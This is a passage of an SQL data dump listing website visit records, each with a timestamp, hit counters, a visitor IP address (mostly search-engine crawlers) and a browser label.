13.180.203.142','chrome'),(498155,1587061125,1,1,0,0,'178.154.200.97','chrome'),(498156,1587061311,1,1,0,0,'213.180.203.16','chrome'),(498157,1587061474,1,1,0,0,'66.249.64.23','chrome'),(498158,1587061584,1,1,0,0,'178.154.200.222','chrome'),(498159,1587061642,2,2,0,0,'8.29.198.27','other'),(498160,1587062018,1,1,0,0,'178.154.200.196','chrome'),(498161,1587062105,1,0,1,0,'157.55.39.206',''),(498162,1587062172,1,1,0,0,'157.55.39.48','other'),(498163,1587062176,1,1,0,0,'213.180.203.16','other'),(498164,1587062953,1,1,0,0,'93.73.199.52','chrome'),(498165,1587062971,1,1,0,0,'91.196.178.28','chrome'),(498166,1587063773,2,2,0,0,'178.154.200.222','chrome'),(498167,1587063777,8,8,0,0,'77.120.98.235','other'),(498168,1587063893,1,1,0,0,'66.249.64.25','chrome'),(498169,1587064189,1,1,0,0,'213.180.203.16','chrome'),(498170,1587065441,1,1,0,0,'178.154.200.191','chrome'),(498171,1587065757,1,1,0,0,'178.154.200.222','other'),(498172,1587065846,2,2,0,0,'157.55.39.206','other'),(498173,1587065854,3,3,0,0,'178.154.200.222','chrome'),(498174,1587065867,1,1,0,0,'5.58.142.199','firefox'),(498175,1587066618,1,1,0,0,'207.46.13.34','other'),(498176,1587067228,1,1,0,0,'213.180.203.16','other'),(498177,1587067418,1,1,0,0,'66.249.64.25','chrome'),(498178,1587067702,1,1,0,0,'178.154.200.222','chrome'),(498179,1587067891,1,1,0,0,'157.55.39.48','other'),(498180,1587067902,1,1,0,0,'91.196.178.170','chrome'),(498181,1587067960,1,1,0,0,'178.154.200.112','other'),(498182,1587068049,5,5,0,0,'82.165.67.51','other'),(498183,1587068161,1,1,0,0,'66.249.64.24','chrome'),(498184,1587068479,1,1,0,0,'213.180.203.16','chrome'),(498185,1587068692,2,2,0,0,'178.154.200.222','chrome'),(498186,1587068880,1,1,0,0,'178.154.200.216','chrome'),(498187,1587069109,1,1,0,0,'178.154.200.196','other'),(498188,1587069279,1,1,0,0,'178.154.200.222','other'),(498189,1587069524,1,1,0,0,'157.55.39.206','other'),(498190,1587069638,1,1,0,0,'66.249.64.24','chrome'),(498191,1587069653,2,2,0,0,'178.154.200.220','chrome'),(498192,1587070614,1,1,0,0,'178.154.200.196','chrome'),(498193,1587070690,1,1,0,0,'178.154.200.220','chrome'),(498194,1587071785,1,1,0,0,'178.154.200.196','chrome'),(498195,1587071825,1,1,0,0,'178.154.200.222','other'),(498196,1587072163,2,2,0,0,'213.180.203.16','other'),(498197,1587072473,2,2,0,0,'8.29.198.25','other'),(498198,1587072676,1,1,0,0,'213.180.203.16','chrome'),(498199,1587072712,2,2,0,0,'178.154.200.222','chrome'),(498200,1587072901,2,2,0,0,'178.154.200.220','chrome'),(498201,1587073478,1,1,0,0,'213.180.203.17','other'),(498202,1587073649,2,2,0,0,'178.154.200.222','chrome'),(498203,1587073837,1,1,0,0,'157.55.39.48','other'),(498204,1587073921,1,1,0,0,'51.68.152.26','chrome'),(498205,1587074244,1,1,0,0,'178.154.200.222','other'),(498206,1587074780,1,1,0,0,'66.249.64.24','chrome'),(498207,1587074832,1,1,0,0,'213.180.203.16','other'),(498208,1587075373,2,2,0,0,'178.154.200.222','chrome'),(498209,1587076106,2,2,0,0,'213.180.203.16','chrome'),(498210,1587076249,1,1,0,0,'178.154.200.220','other'),(498211,1587078031,1,1,0,0,'46.101.0.118','chrome'),(498212,1587078174,1,1,0,0,'172.105.95.101','chrome'),(498213,1587078956,1,1,0,0,'178.154.200.222','other'),(498214,1587079035,1,1,0,0,'178.154.200.220','chrome'),(498215,1587079614,1,1,0,0,'157.55.39.48','other'),(498216,1587079841,1,1,0,0,'178.154.200.222','chrome'),(498217,1587080183,8,8,0,0,'77.120.98.235','other'),(498218,1587080320,1,1,0,0,'213.180.203.16','other'),(498219,1587080478,1,1,0,0,'94.130.9.183','other'),(498220,1587080533,1,0,1,0,'66.249.64.23',''),(498221,1587080635,1,1,0,0,'178.154.200.119','chrome'),(498222,1587081278,1,1,0,0,'213.180.203.16','chrome'),(498223,1587081306,1,1,0,0,'62.205.134.182','other'),(498224,1587081567,1,1,0,0,'178.154.200.196','chrome'),(498225,1587081580,1,1,0,0,'66.249.64.24','chrome'),(498226,1587081766,1,1,0,0,'178.154.200.216','chrome'),(498227,1587082110,1,1,0,0,'178.154.200.97','chrome'),(498228,1587082125,2,2,0,0,'178.154.200.222','chrome'),(498229,1587082853,2,2,0,0,'66.249.64.25','chrome'),(498230,1587082968,2,2,0,0,'178.154.200.196','chrome'),(498231,1587083191,1,1,0,0,'178.154.200.222','other'),(498232,1587083284,2,2,0,0,'178.154.200.222','chrome'),(498233,1587083294,1,1,0,0,'8.29.198.26','other'),(498234,1587083723,1,1,0,0,'8.29.198.25','other'),(498235,1587084240,1,1,0,0,'178.154.200.222','other'),(498236,1587084518,1,1,0,0,'178.154.200.97','chrome'),(498237,1587084921,2,2,0,0,'66.249.64.25','chrome'),(498238,1587085359,1,1,0,0,'66.249.70.36','chrome'),(498239,1587085425,1,1,0,0,'157.55.39.206','other'),(498240,1587085949,2,2,0,0,'66.249.64.25','chrome'),(498241,1587086169,1,1,0,0,'66.249.64.24','chrome'),(498242,1587086497,3,3,0,0,'178.154.200.222','chrome'),(498243,1587086882,2,2,0,0,'178.154.200.97','chrome'),(498244,1587086901,1,1,0,0,'178.154.200.216','chrome'),(498245,1587086920,1,1,0,0,'178.154.200.196','chrome'),(498246,1587087236,1,1,0,0,'213.180.203.16','chrome'),(498247,1587087291,1,1,0,0,'157.55.39.206','other'),(498248,1587088083,3,3,0,0,'178.154.200.222','chrome'),(498249,1587088332,2,2,0,0,'213.180.203.16','chrome'),(498250,1587088906,1,1,0,0,'178.154.200.220','chrome'),(498251,1587089032,1,1,0,0,'157.55.39.206','other'),(498252,1587089237,1,1,0,0,'207.46.13.34','other'),(498253,1587089416,1,1,0,0,'178.154.200.191','chrome'),(498254,1587089420,1,1,0,0,'178.154.200.216','chrome'),(498255,1587089424,1,1,0,0,'178.154.200.41','chrome'),(498256,1587090112,2,2,0,0,'178.154.200.220','chrome'),(498257,1587090518,2,2,0,0,'213.180.203.16','chrome'),(498258,1587090582,2,2,0,0,'178.154.200.222','chrome'),(498259,1587090708,1,1,0,0,'66.249.64.24','chrome'),(498260,1587090719,1,1,0,0,'66.249.70.36','chrome'),(498261,1587091441,2,2,0,0,'66.249.64.23','chrome'),(498262,1587091890,3,3,0,0,'178.154.200.222','chrome'),(498263,1587092157,1,1,0,0,'66.249.70.33','chrome'),(498264,1587092259,1,1,0,0,'178.154.200.220','chrome'),(498265,1587092328,1,1,0,0,'213.180.203.16','chrome'),(498266,1587092367,1,1,0,0,'207.46.13.34','other'),(498267,1587092817,2,2,0,0,'178.154.200.222','other'),(498268,1587092928,2,2,0,0,'66.249.64.25','chrome'),(498269,1587093626,1,1,0,0,'66.249.70.33','chrome'),(498270,1587093628,1,1,0,0,'178.154.200.222','chrome'),(498271,1587094118,1,1,0,0,'8.29.198.26','other'),(498272,1587094552,1,1,0,0,'8.29.198.25','other'),(498273,1587095739,2,2,0,0,'157.55.39.206','other'),(498274,1587096182,1,1,0,0,'157.55.39.48','other'),(498275,1587096263,8,8,0,0,'77.120.98.235','other'),(498276,1587096746,1,1,0,0,'69.28.88.137','chrome'),(498277,1587097318,1,1,0,0,'66.249.64.25','chrome'),(498278,1587097337,1,1,0,0,'66.249.64.23','chrome'),(498279,1587098732,1,1,0,0,'62.205.134.182','other'),(498280,1587099170,1,0,1,0,'157.55.39.206',''),(498281,1587100544,1,1,0,0,'157.55.39.206','other'),(498282,1587101416,1,1,0,0,'157.55.39.48','other'),(498283,1587101515,1,1,0,0,'66.249.64.23','chrome'),(498284,1587102038,1,1,0,0,'31.13.103.2','other'),(498285,1587102039,1,1,0,0,'31.13.103.4','other'),(498286,1587102682,1,1,0,0,'66.249.70.33','chrome'),(498287,1587102972,1,1,0,0,'157.55.39.48','other'),(498288,1587103108,1,1,0,0,'35.243.23.4','chrome'),(498289,1587104187,2,1,1,0,'157.55.39.206',''),(498290,1587104761,1,1,0,0,'91.196.178.76','chrome'),(498291,1587104885,1,1,0,0,'207.46.13.34','other'),(498292,1587104949,1,1,0,0,'8.29.198.27','other'),(498293,1587105014,1,1,0,0,'13.66.139.0','other'),(498294,1587105051,1,1,0,0,'91.196.178.151','chrome'),(498295,1587105246,1,1,0,0,'66.249.64.25','chrome'),(498296,1587105378,1,1,0,0,'8.29.198.26','other'),(498297,1587105400,1,1,0,0,'91.196.178.79','chrome'),(498298,1587105611,1,1,0,0,'157.55.39.206','other'),(498299,1587105987,1,1,0,0,'91.196.178.93','firefox'),(498300,1587106196,1,1,0,0,'207.46.13.235','other'),(498301,1587106243,1,1,0,0,'91.196.177.46','chrome'),(498302,1587106471,1,1,0,0,'157.55.39.48','other'),(498303,1587106486,1,1,0,0,'2.47.39.210','other'),(498304,1587106741,3,3,0,0,'66.249.64.24','chrome'),(498305,1587107172,7,7,0,0,'3.230.167.154','firefox'),(498306,1587107182,1,1,0,0,'66.249.70.38','chrome'),(498307,1587107899,1,1,0,0,'207.46.13.34','other'),(498308,1587108326,1,1,0,0,'91.196.178.76','chrome'),(498309,1587109400,1,1,0,0,'94.158.95.133','other'),(498310,1587109965,8,8,0,0,'77.120.98.235','other'),(498311,1587110571,3,3,0,0,'207.46.13.34','other'),(498312,1587110575,3,3,0,0,'157.55.39.206','other'),(498313,1587110736,2,2,0,0,'157.55.39.48','other'),(498314,1587111239,1,1,0,0,'91.196.178.76','chrome'),(498315,1587111658,1,1,0,0,'66.249.64.24','chrome'),(498316,1587112141,1,1,0,0,'91.196.178.76','chrome'),(498317,1587112465,1,1,0,0,'46.219.206.84','chrome'),(498318,1587114990,1,1,0,0,'157.55.39.48','other'),(498319,1587115221,1,1,0,0,'91.196.178.76','firefox'),(498320,1587115247,1,1,0,0,'173.252.111.3','other'),(498321,1587115248,1,1,0,0,'173.252.111.19','other'),(498322,1587115711,1,1,0,0,'207.46.13.34','other'),(498323,1587115776,2,2,0,0,'8.29.198.27','other'),(498324,1587115952,1,1,0,0,'91.196.178.76','chrome'),(498325,1587116236,1,1,0,0,'157.55.39.48','other'),(498326,1587116347,1,1,0,0,'91.196.178.76','firefox'),(498327,1587116451,1,1,0,0,'3.12.103.50','chrome'),(498328,1587119233,1,1,0,0,'91.196.178.79','firefox'),(498329,1587119758,1,1,0,0,'66.249.64.25','chrome'),(498330,1587120451,1,1,0,0,'176.36.88.53','chrome'),(498331,1587121547,1,1,0,0,'66.249.64.25','chrome'),(498332,1587121709,1,1,0,0,'178.154.200.222','chrome'),(498333,1587121934,1,1,0,0,'66.249.64.23','chrome'),(498334,1587122090,1,1,0,0,'207.46.13.34','other'),(498335,1587122535,1,1,0,0,'157.55.39.206','other'),(498336,1587122786,1,1,0,0,'91.196.177.46','chrome'),(498337,1587123465,1,1,0,0,'109.74.154.72','chrome'),(498338,1587123746,1,1,0,0,'178.154.200.216','chrome'),(498339,1587124021,1,0,1,0,'66.249.64.23',''),(498340,1587124079,1,1,0,0,'178.154.200.236','chrome'),(498341,1587124367,1,1,0,0,'213.180.203.16','chrome'),(498342,1587124382,1,1,0,0,'91.196.178.76','chrome'),(498343,1587124728,8,8,0,0,'77.120.98.235','other'),(498344,1587124953,1,1,0,0,'193.106.30.99','firefox'),(498345,1587125047,1,1,0,0,'66.249.64.23','chrome'),(498346,1587125103,1,1,0,0,'66.249.64.25','chrome'),(498347,1587125262,1,1,0,0,'207.46.13.34','other'),(498348,1587125621,1,1,0,0,'131.220.6.152','chrome'),(498349,1587125756,1,1,0,0,'178.154.200.97','chrome'),(498350,1587125912,1,1,0,0,'213.180.203.16','chrome'),(498351,1587125927,3,3,0,0,'157.55.39.206','other'),(498352,1587126138,1,1,0,0,'178.154.200.196','chrome'),(498353,1587126315,1,1,0,0,'66.249.64.23','chrome'),(498354,1587126600,1,1,0,0,'8.29.198.27','other'),(498355,1587126606,1,1,0,0,'91.196.178.48','chrome'),(498356,1587126756,1,1,0,0,'66.249.64.24','chrome'),(498357,1587126907,1,1,0,0,'178.154.200.222','chrome'),(498358,1587127028,1,1,0,0,'8.29.198.25','other'),(498359,1587127241,1,1,0,0,'195.69.222.61','chrome'),(498360,1587127454,1,1,0,0,'66.249.70.33','chrome'),(498361,1587127750,1,1,0,0,'195.238.119.34','chrome'),(498362,1587127785,1,1,0,0,'66.249.64.23','chrome'),(498363,1587127840,1,1,0,0,'66.249.70.36','chrome'),(498364,1587128268,1,1,0,0,'91.196.178.76','chrome'),(498365,1587128362,1,1,0,0,'178.154.200.236','chrome'),(498366,1587128529,1,1,0,0,'207.46.13.34','other'),(498367,1587128813,1,1,0,0,'66.249.64.25','chrome'),(498368,1587129063,1,1,0,0,'66.249.64.23','chrome'),(498369,1587129501,1,1,0,0,'178.95.159.205','chrome'),(498370,1587129777,2,2,0,0,'157.55.39.48','other'),(498371,1587129780,1,1,0,0,'46.211.62.179','chrome'),(498372,1587130195,1,1,0,0,'178.154.200.220','chrome'),(498373,1587130584,1,1,0,0,'94.153.17.13','chrome'),(498374,1587130643,1,1,0,0,'178.95.159.205','chrome'),(498375,1587130796,1,1,0,0,'157.55.39.206','other'),(498376,1587130877,1,1,0,0,'178.133.96.209','chrome'),(498377,1587130965,1,1,0,0,'207.46.13.34','other'),(498378,1587131106,1,1,0,0,'173.252.111.22','other'),(498379,1587131107,2,2,0,0,'173.252.111.1','other'),(498381,1587131126,1,1,0,0,'173.252.111.2','other'),(498382,1587131128,1,1,0,0,'173.252.111.12','other'),(498383,1587131132,2,2,0,0,'173.252.111.19','other'),(498384,1587131133,1,1,0,0,'173.252.87.3','other'),(498386,1587131174,1,1,0,0,'31.13.127.2','other'),(498387,1587131176,1,1,0,0,'31.13.127.6','other'),(498392,1587131258,1,1,0,0,'173.252.111.4','other'),(498393,1587131261,1,1,0,0,'173.252.95.11','other'),(498394,1587131262,1,1,0,0,'69.171.251.25','other'),(498395,1587131463,2,2,0,0,'178.154.200.222','chrome'),(498396,1587131699,3,3,0,0,'157.55.39.48','other'),(498397,1587131968,1,1,0,0,'92.113.191.19','chrome'),(498398,1587133308,1,1,0,0,'213.180.203.16','other'),(498399,1587133505,1,1,0,0,'91.124.82.16','firefox'),(498400,1587133589,1,1,0,0,'66.249.70.33','chrome'),(498401,1587133939,1,1,0,0,'178.154.200.220','chrome'),(498402,1587134158,1,1,0,0,'66.249.64.24','chrome'),(498403,1587134876,1,1,0,0,'91.196.178.45','chrome'),(498404,1587134903,1,1,0,0,'128.124.9.213','chrome'),(498405,1587135183,1,1,0,0,'213.180.203.16','chrome'),(498406,1587135720,1,1,0,0,'178.154.200.222','other'),(498407,1587136057,1,1,0,0,'157.55.39.48','other'),(498408,1587136315,1,0,1,0,'157.55.39.206',''),(498409,1587136787,2,2,0,0,'178.154.200.222','chrome'),(498410,1587136791,1,1,0,0,'213.180.203.16','chrome'),(498411,1587136826,2,1,1,0,'157.55.39.206',''),(498412,1587137011,1,1,0,0,'178.154.200.220','chrome'),(498413,1587137099,1,1,0,0,'157.55.39.48','other'),(498414,1587137171,1,1,0,0,'94.153.24.141','other'),(498415,1587137427,1,1,0,0,'8.29.198.26','other'),(498416,1587137855,1,1,0,0,'8.29.198.25','other'),(498417,1587137916,1,1,0,0,'157.55.39.206','other'),(498418,1587138303,1,1,0,0,'209.17.96.106','other'),(498419,1587138983,2,2,0,0,'157.55.39.48','other'),(498420,1587139319,1,1,0,0,'207.46.13.34','other'),(498421,1587139346,8,8,0,0,'77.120.98.235','other'),(498422,1587139424,1,1,0,0,'157.55.39.206','other'),(498423,1587139571,1,1,0,0,'178.175.132.74','chrome'),(498424,1587140390,1,1,0,0,'178.154.200.222','chrome'),(498425,1587140619,1,1,0,0,'213.180.203.16','chrome'),(498426,1587140732,1,1,0,0,'213.180.203.16','other'),(498427,1587140808,1,1,0,0,'46.211.66.121','other'),(498428,1587141220,1,1,0,0,'157.55.39.206','other'),(498429,1587141335,1,1,0,0,'157.55.39.48','other'),(498430,1587141812,1,1,0,0,'178.154.200.87','chrome'),(498431,1587142148,1,1,0,0,'66.249.64.25','chrome'),(498432,1587142179,1,1,0,0,'178.154.200.220','chrome'),(498433,1587142441,1,1,0,0,'213.180.203.16','other'),(498434,1587142801,1,1,0,0,'178.154.200.196','chrome'),(498435,1587142944,1,1,0,0,'213.180.203.16','chrome'),(498436,1587143495,1,1,0,0,'207.46.13.34','other'),(498437,1587144129,1,1,0,0,'213.180.203.95','chrome'),(498438,1587144262,1,1,0,0,'178.154.200.220','other'),(498439,1587144391,1,1,0,0,'178.154.200.222','other'),(498440,1587144528,1,1,0,0,'94.242.54.22','chrome'),(498441,1587144605,1,1,0,0,'213.180.203.17','chrome'),(498442,1587145038,1,1,0,0,'157.55.39.225','other'),(498443,1587145254,1,1,0,0,'157.55.39.48','other'),(498444,1587145424,1,1,0,0,'66.249.70.36','chrome'),(498445,1587145441,2,2,0,0,'173.252.111.18','other'),(498446,1587146045,1,1,0,0,'178.154.200.222','other'),(498447,1587146084,1,1,0,0,'66.102.9.164','chrome'),(498448,1587146509,1,1,0,0,'66.249.64.24','chrome'),(498449,1587146515,1,1,0,0,'157.55.39.206','other'),(498450,1587146646,1,1,0,0,'213.180.203.122','chrome'),(498451,1587146830,1,1,0,0,'91.196.178.16','chrome'),(498452,1587146833,1,1,0,0,'173.252.111.4','other'),(498453,1587146887,1,1,0,0,'66.249.64.23','chrome'),(498454,1587147110,1,1,0,0,'178.154.200.97','chrome'),(498455,1587147144,1,1,0,0,'66.249.64.25','chrome'),(498456,1587147250,1,1,0,0,'178.154.200.222','other'),(498457,1587147595,1,1,0,0,'213.180.203.122','chrome'),(498458,1587147818,1,1,0,0,'178.154.200.220','chrome'),(498459,1587148064,1,1,0,0,'157.55.39.206','other'),(498460,1587148192,2,2,0,0,'178.154.200.222','other'),(498461,1587148261,2,2,0,0,'8.29.198.26','other'),(498462,1587148411,1,1,0,0,'178.154.200.222','chrome'),(498463,1587148498,2,2,0,0,'213.180.203.16','chrome'),(498464,1587148809,1,1,0,0,'66.249.70.33','chrome'),(498465,1587148815,1,1,0,0,'178.154.200.220','other'),(498466,1587149015,1,1,0,0,'157.55.39.48','other'),(498467,1587149117,1,1,0,0,'178.154.200.220','chrome'),(498468,1587149169,4,4,0,0,'178.154.200.222','other'),(498469,1587149172,1,1,0,0,'213.180.203.122','chrome'),(498470,1587149231,1,1,0,0,'178.154.200.97','chrome'),(498471,1587149812,2,2,0,0,'213.180.203.16','other'),(498472,1587149908,1,1,0,0,'47.56.91.103','chrome'),(498473,1587150381,1,1,0,0,'178.154.200.220','chrome'),(498474,1587150599,1,1,0,0,'91.196.178.16','chrome'),(498475,1587150847,1,1,0,0,'178.154.200.222','other'),(498476,1587151352,1,1,0,0,'178.154.200.222','chrome'),(498477,1587151540,2,2,0,0,'157.55.39.206','other'),(498478,1587151682,1,1,0,0,'157.55.39.225','other'),(498479,1587151705,1,0,1,0,'66.249.70.36',''),(498480,1587151927,1,1,0,0,'46.133.117.198','chrome'),(498481,1587152103,1,1,0,0,'66.249.64.24','chrome'),(498482,1587152183,1,1,0,0,'91.196.178.42','chrome'),(498483,1587152546,1,1,0,0,'207.46.13.34','other'),(498484,1587152955,1,1,0,0,'178.154.200.222','other'),(498485,1587153001,1,1,0,0,'178.154.200.196','other'),(498486,1587153198,1,1,0,0,'157.55.39.48','other'),(498487,1587153670,1,1,0,0,'213.180.203.16','chrome'),(498488,1587153844,1,1,0,0,'213.180.203.16','other'),(498489,1587153971,225,225,0,0,'144.76.14.153','other'),(498490,1587154156,3,3,0,0,'178.154.200.222','other'),(498491,1587154319,1,1,0,0,'178.154.200.196','other'),(498492,1587155171,3,3,0,0,'157.55.39.48','other'),(498493,1587155295,1,1,0,0,'207.46.13.34','other'),(498494,1587155317,1,1,0,0,'66.249.64.24','chrome'),(498495,1587155319,1,1,0,0,'213.180.203.16','chrome'),(498496,1587155423,2,2,0,0,'213.180.203.16','other'),(498497,1587155590,1,1,0,0,'178.154.200.222','other'),(498498,1587155993,1,1,0,0,'157.55.39.225','other'),(498499,1587156180,1,1,0,0,'66.249.64.25','chrome'),(498500,1587156282,1,1,0,0,'178.154.200.222','chrome'),(498501,1587156508,2,2,0,0,'178.154.200.222','other'),(498502,1587156713,1,1,0,0,'66.249.64.23','chrome'),(498503,1587156728,1,1,0,0,'178.154.200.220','other'),(498504,1587156833,1,1,0,0,'178.154.200.92','other'),(498505,1587157754,2,2,0,0,'157.55.39.225','other'),(498506,1587157774,1,1,0,0,'138.246.253.15','chrome'),(498507,1587157794,2,2,0,0,'178.154.200.222','other'),(498508,1587157814,1,1,0,0,'207.46.13.34','other'),(498509,1587158024,1,1,0,0,'178.154.200.196','chrome'),(498510,1587158235,1,1,0,0,'157.55.39.48','other'),(498511,1587158238,1,1,0,0,'66.249.64.23','chrome'),(498512,1587158330,1,1,0,0,'178.154.200.236','chrome'),(498513,1587158723,1,1,0,0,'178.154.200.222','other'),(498514,1587159090,2,2,0,0,'8.29.198.25','other'),(498515,1587159376,2,2,0,0,'213.180.203.16','other'),(498516,1587159405,1,1,0,0,'178.154.200.196','other'),(498517,1587159566,1,1,0,0,'157.55.39.225','other'),(498518,1587159685,1,1,0,0,'37.52.19.23','firefox'),(498519,1587159691,1,1,0,0,'157.55.39.48','other'),(498520,1587159702,1,1,0,0,'178.154.200.97','other'),(498521,1587160288,1,1,0,0,'178.154.200.222','chrome'),(498522,1587160449,1,1,0,0,'157.55.39.206','other'),(498523,1587160782,1,1,0,0,'69.171.251.26','other'),(498524,1587160901,1,1,0,0,'66.249.64.23','chrome'),(498525,1587160976,1,1,0,0,'178.154.200.216','chrome'),(498526,1587161022,1,1,0,0,'178.154.200.222','other'),(498527,1587161124,1,1,0,0,'178.154.200.196','chrome'),(498528,1587161343,1,1,0,0,'178.154.200.220','chrome'),(498529,1587161589,3,3,0,0,'157.55.39.225','other'),(498530,1587161604,1,0,1,0,'157.55.39.206',''),(498531,1587161984,1,1,0,0,'206.41.169.99','chrome'),(498532,1587161986,1,1,0,0,'66.249.64.23','chrome'),(498533,1587161990,1,1,0,0,'107.158.86.230','chrome'),(498534,1587162241,3,3,0,0,'178.154.200.222','other'),(498535,1587162262,2,2,0,0,'207.46.13.34','other'),(498536,1587162489,1,1,0,0,'213.180.203.16','other'),(498537,1587162728,1,1,0,0,'178.154.200.222','chrome'),(498538,1587163084,1,1,0,0,'213.180.203.16','chrome'),(498539,1587163244,1,1,0,0,'157.55.39.206','other'),(498540,1587163286,1,1,0,0,'157.55.39.48','other'),(498541,1587163504,1,1,0,0,'213.180.203.17','other'),(498542,1587163673,1,1,0,0,'157.55.39.225','other'),(498543,1587163932,1,1,0,0,'66.249.64.25','chrome'),(498544,1587163999,1,1,0,0,'178.154.200.222','chrome'),(498545,1587164146,4,4,0,0,'178.154.200.222','other'),(498546,1587164166,1,1,0,0,'213.180.203.95','chrome'),(498547,1587164890,1,0,1,0,'157.55.39.48',''),(498548,1587165026,1,1,0,0,'157.55.39.206','other'),(498549,1587165032,1,1,0,0,'213.180.203.16','other'),(498550,1587165036,1,1,0,0,'178.154.200.97','chrome'),(498551,1587165082,2,2,0,0,'207.46.13.34','other'),(498552,1587165207,2,2,0,0,'178.154.200.220','other'),(498553,1587165498,1,1,0,0,'178.154.200.220','chrome'),(498554,1587165883,1,1,0,0,'178.154.200.222','other'),(498555,1587165914,1,1,0,0,'178.154.200.222','chrome'),(498556,1587166040,1,1,0,0,'207.46.13.34','other'),(498557,1587166353,1,1,0,0,'213.180.203.16','chrome'),(498558,1587166580,1,1,0,0,'213.180.203.140','chrome'),(498559,1587166823,1,1,0,0,'157.55.39.48','other'),(498560,1587167175,1,1,0,0,'206.123.139.214','chrome'),(498561,1587167286,2,2,0,0,'178.154.200.222','other'),(498562,1587167299,8,8,0,0,'77.120.98.235','other'),(498563,1587167707,1,1,0,0,'62.205.134.182','other'),(498564,1587167752,1,1,0,0,'66.249.64.24','chrome'),(498565,1587167850,1,1,0,0,'157.55.39.225','other'),(498566,1587168545,2,2,0,0,'178.154.200.222','other'),(498567,1587168547,1,0,1,0,'157.55.39.48',''),(498568,1587168704,1,1,0,0,'178.154.200.196','chrome'),(498569,1587168869,2,2,0,0,'157.55.39.225','other'),(498570,1587168876,1,1,0,0,'207.46.13.34','other'),(498571,1587169171,3,3,0,0,'213.180.203.16','other'),(498572,1587169378,1,1,0,0,'178.154.200.222','chrome'),(498573,1587169916,1,1,0,0,'8.29.198.25','other'),(498574,1587169993,1,1,0,0,'66.249.70.38','chrome'),(498575,1587170341,1,1,0,0,'8.29.198.27','other'),(498576,1587170350,2,2,0,0,'207.46.13.34','other'),(498577,1587170619,1,1,0,0,'178.154.200.196','chrome'),(498578,1587170645,1,1,0,0,'178.154.200.92','chrome'),(498579,1587170978,2,2,0,0,'157.55.39.225','other'),(498580,1587171032,2,2,0,0,'178.154.200.222','other'),(498581,1587171719,1,1,0,0,'178.154.200.97','other'),(498582,1587171742,1,0,1,0,'207.46.13.34',''),(498583,1587171941,4,4,0,0,'178.154.200.222','other'),(498584,1587171991,1,1,0,0,'157.55.39.206','other'),(498585,1587172123,2,2,0,0,'157.55.39.48','other'),(498586,1587172197,1,1,0,0,'213.180.203.16','other'),(498587,1587172748,1,1,0,0,'66.249.64.23','chrome'),(498588,1587173169,2,2,0,0,'178.154.200.222','other'),(498589,1587173746,2,2,0,0,'157.55.39.225','other'),(498590,1587174093,2,2,0,0,'178.154.200.222','other'),(498591,1587174291,2,2,0,0,'66.249.64.25','chrome'),(498592,1587175220,2,2,0,0,'178.154.200.222','other'),(498593,1587175422,1,1,0,0,'157.55.39.206','other'),(498594,1587175429,1,1,0,0,'66.249.64.24','chrome'),(498595,1587175736,1,1,0,0,'157.55.39.225','other'),(498596,1587175978,2,2,0,0,'213.180.203.16','chrome'),(498597,1587176316,1,1,0,0,'213.180.203.17','chrome'),(498598,1587176318,2,2,0,0,'178.154.200.220','chrome'),(498599,1587176627,2,2,0,0,'207.46.13.34','other'),(498600,1587176678,1,1,0,0,'178.154.200.97','chrome'),(498601,1587176782,1,1,0,0,'95.217.77.97','chrome'),(498602,1587177799,1,1,0,0,'178.154.200.220','chrome'),(498603,1587177808,1,1,0,0,'213.180.203.101','chrome'),(498604,1587178405,1,1,0,0,'66.249.64.25','chrome'),(498605,1587178597,1,1,0,0,'213.180.203.16','chrome'),(498606,1587178731,1,1,0,0,'157.55.39.206','other'),(498607,1587179505,1,0,1,0,'207.46.13.34',''),(498608,1587180282,2,2,0,0,'213.180.203.16','chrome'),(498609,1587180586,1,1,0,0,'178.154.200.220','chrome'),(498610,1587180746,1,1,0,0,'8.29.198.27','other'),(498611,1587180966,2,2,0,0,'178.154.200.222','chrome'),(498612,1587181169,1,1,0,0,'8.29.198.25','other'),(498613,1587181212,3,2,1,0,'157.55.39.225',''),(498614,1587181600,1,1,0,0,'91.196.178.16','chrome'),(498615,1587182075,1,1,0,0,'213.180.203.16','other'),(498616,1587182319,1,1,0,0,'178.154.200.220','other'),(498617,1587182388,1,1,0,0,'157.55.39.206','other'),(498618,1587183089,1,1,0,0,'66.249.70.36','chrome'),(498619,1587183208,1,1,0,0,'31.13.115.18','other'),(498620,1587183209,1,1,0,0,'31.13.115.2','other'),(498621,1587183733,1,1,0,0,'213.180.203.16','other'),(498622,1587183896,1,1,0,0,'178.154.200.119','chrome'),(498623,1587184070,1,1,0,0,'178.154.200.222','chrome'),(498624,1587184834,1,1,0,0,'213.180.203.142','chrome'),(498625,1587185258,1,1,0,0,'62.205.134.182','other'),(498626,1587185319,1,1,0,0,'213.180.203.16','chrome'),(498627,1587185625,2,2,0,0,'178.154.200.220','chrome'),(498628,1587185969,1,1,0,0,'178.154.200.97','chrome'),(498629,1587186339,1,1,0,0,'157.55.39.225','other'),(498630,1587186582,1,1,0,0,'94.153.31.158','other'),(498631,1587186594,1,1,0,0,'34.91.170.60','other'),(498632,1587186985,2,2,0,0,'178.154.200.222','chrome'),(498633,1587187339,8,8,0,0,'77.120.98.235','other'),(498634,1587187792,1,1,0,0,'157.55.39.206','other'),(498635,1587188370,2,2,0,0,'207.46.13.34','other'),(498636,1587188408,1,1,0,0,'178.154.200.222','chrome'),(498637,1587188625,1,1,0,0,'178.154.200.220','chrome'),(498638,1587188911,1,1,0,0,'213.180.203.16','chrome'),(498639,1587188933,1,1,0,0,'178.154.200.236','other'),(498640,1587189359,1,1,0,0,'91.196.178.16','chrome'),(498641,1587189628,1,1,0,0,'66.249.64.24','chrome'),(498642,1587189883,2,2,0,0,'178.154.200.222','other'),(498643,1587191281,1,1,0,0,'66.249.70.38','chrome'),(498644,1587191576,1,1,0,0,'8.29.198.27','other'),(498645,1587191676,1,0,1,0,'157.55.39.206',''),(498646,1587191684,1,1,0,0,'66.249.64.25','chrome'),(498647,1587191859,2,2,0,0,'157.55.39.225','other'),(498648,1587191917,1,1,0,0,'178.154.200.220','chrome'),(498649,1587191993,1,1,0,0,'8.29.198.25','other'),(498650,1587192132,2,2,0,0,'178.154.200.97','chrome'),(498651,1587192324,1,1,0,0,'91.196.178.16','chrome'),(498652,1587192515,1,1,0,0,'31.13.127.17','other'),(498653,1587192790,2,2,0,0,'157.55.39.225','other'),(498654,1587193048,1,1,0,0,'93.73.199.52','chrome'),(498655,1587193747,1,1,0,0,'213.180.203.17','chrome'),(498656,1587194449,1,1,0,0,'213.180.203.16','other'),(498657,1587194593,3,3,0,0,'157.55.39.225','other'),(498658,1587194611,2,2,0,0,'178.154.200.222','other'),(498659,1587194679,2,2,0,0,'157.55.39.206','other'),(498660,1587194683,1,1,0,0,'20